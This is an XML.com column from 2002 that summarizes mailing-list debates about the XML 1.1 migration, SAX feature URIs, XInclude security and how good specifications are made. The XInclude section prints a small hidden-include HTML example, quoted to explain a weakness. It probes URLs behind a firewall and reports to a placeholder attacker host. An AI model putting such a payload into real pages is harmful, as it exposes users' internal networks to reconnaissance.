XML.com: XML From the Inside Out
oreilly.comSafari Bookshelf.Conferences.

advertisement

Community and Specifications

Community and Specifications

October 30, 2002

In last week's column I looked at the XML development community's reaction to the XML 1.1 Candidate Recommendation. Some of the changes which generated developer interest include Unicode character normalization, new permissible control characters, and new line-ending rules. The pressures to migrate to XML 1.1 are likely to be greatest in the case of XML applications which primarily consume XML. Finally, I suggested that the key to XML 1.1 migration is the XML infrastructure vendors, particularly XML parser providers.

In this week's column I return to pick up a bit more of the community's debate about XML 1.1 before reviewing several other matters, including XInclude security and what processes or methodologies make for good XML specifications.

SAX Feature URIs and XML 1.1

Rick Jelliffe suggested that, in order to handle XML 1.1 properly, two SAX feature URIs need to be declared. He suggested, first, http://xml.org/sax/features/xml1.1, which says whether the parser can parse XML 1.1. Secondly, he proposed http://xml.org/sax/features/normalization, which says whether the parser supports Unicode character normalization. John Cowan pointed out that most existing XML documents can be migrated from 1.0 to 1.1 by updating the version declaration. "There is no such thing," Cowan said, "as a document that is both well-formed 1.0 and well-formed 1.1". So, at least in that limited sense, there is a greater difference between XML 1.0 and 1.1 than there was between XML 1.0 and SGML.

Elliotte Rusty Harold disagreed with Cowan's claim that no XML documents may be both 1.1 and 1.0: "There is nothing here that requires 1.0 parsers to signal an error when they encounter a 1.1 document...it is possible to have a document that is both well-formed 1.0 XML and well-formed 1.1 XML". But there's always the specification errata to consult, which Cowan claimed settled the matter. Harold's response expresses, I think, a common frustration with the W3C -- "Another erratum that rewrites history because the working group changed its mind. Sorry. I don't accept such errata as normative. The spec is clear and unambiguous. There is no plausible argument that the original spec made a mistake. The people who wrote the spec knew what they were writing and why they were writing it. Now, retroactively, somebody's decided they were wrong, and they're going to fix it". Or, as Andrew Watt put it: "It is one of the recurring problems of W3C specification documents that WG members take it to mean what they intended it to mean while...those who take the time to read the document...have to go by...what was stated..."

John Cowan's final word on the matter is representative of what seems to be a growing sense of the W3C's tendency to make unilateral pronouncements in such matters. "Like it or not," Cowan said, "XML 1.0, like all W3C recommendations, is a living document".

How Secure is XInclude?

Inclusion mechanisms and the wild, woolly Web often combine to create security problems disproportionate to their utility. One trouble with URLs is that they are, well, universal, and just about anyone can put just about anything at the end of one. Including devious attempts to steal your cookie file, your checking account, your children's toys, and your /etc/passwd file. Nasty stuff.

So how secure is XInclude? Elliotte Rusty Harold started a conversation with that question. The general response to Harold's example and analysis is that XInclude is about as vulnerable as other browser-based inclusion mechanisms, mostly based in Javascript hacks, including external entity references.

Harold's example (slightly simplified from the original) is worth looking at in some detail --

<html xmlns:xi="http://www.w3.org/2001/XInclude">
    <body>Here's what the user normally sees</body>
    <span style="display: none">
      <xi:include parse="text" href="http://www.behindthefirewall.com/someURL">
        <xi:fallback href="http://www.hacker.com/?someURL=doesNotExist" />
      </xi:include>
    </span>
<html>

This allows a malicious site to check for the presence of files behind the firewall. "The biggest problem" with this kind of attack, Harold notes, "is that the attacker must have some good guesses as to likely local URLs, and also some reason to want to know them; but it seems to have the potential to expose information from behind the firewall that the user might not wish exposed". Such guesses are often not hard to make.

It's a subject which will likely see much more discussion from the XML development and browser-making communities.

How to Make Good XML Specs, Or Is James Clark Required?

James Clark probably deserves all the adulation he gets in markup circles. Getting the adulation you deserve is unobjectionable. But adulation is the sort of thing which easily gets out of hand. Thomas Passin asked, perhaps mostly tongue in cheek, whether it takes James Clark to write a decent XML specification.

Passin's real point, I take it, was to ask about ways, good and bad, of creating specifications, which is an important issue in the XML world. The great irony of Passin's question is that XML got started in part because SGML was so complicated that, or so it sometimes seemed at the time, only James Clark could write fully compliant, free, well performing SGML parser.

The real questions about specification creation are whether some people, including James Clark, are uniquely good at making specs, whether there are some ways of making them which lead to better outcomes than other ways, and whether the good modes of spec creation can be more widely implemented.

David Megginson suggested four rules for getting good specifications, none of which should be too surprising from someone who led the development of SAX, still the most successful XML spec driven purely by the XML development community. (Though eventually it will probably share this title with RELAX NG.) Megginson's Four Laws are

  1. Simplicity succeeds
  2. Process is poison
  3. Code first, then specify
  4. Almost every new spec fails anyway

Michael Kay suggested that one of the important differences is whether the specification is driven by corporate or non-corporate interests:

When individuals do it, primarily for intellectual satisfaction rather than to make money, then it comes out anywhere from brilliant to awful depending on the skills of the individual. And if it's awful then everyone ignores it. When corporations do it for commercial profit, then it comes out usable but mediocre.

Also in XML-Deviant

The More Things Change

Agile XML

Composition

Apple Watch

Life After Ajax?

Corporate backing isn't a predictor of specification success, but it does tend to ensure that a specification gets a decent hearing. This is a point Simon St. Laurent echoed, "Individuals creating specs face a serious uphill battle in getting their proposals noticed, much less implemented."

After a relatively quiet patch, it looks like XML-DEV is starting to heat up again. One hopes it will return to breaking new ground regularly, rather than getting bogged down again in classic and, at this point, interminable debates.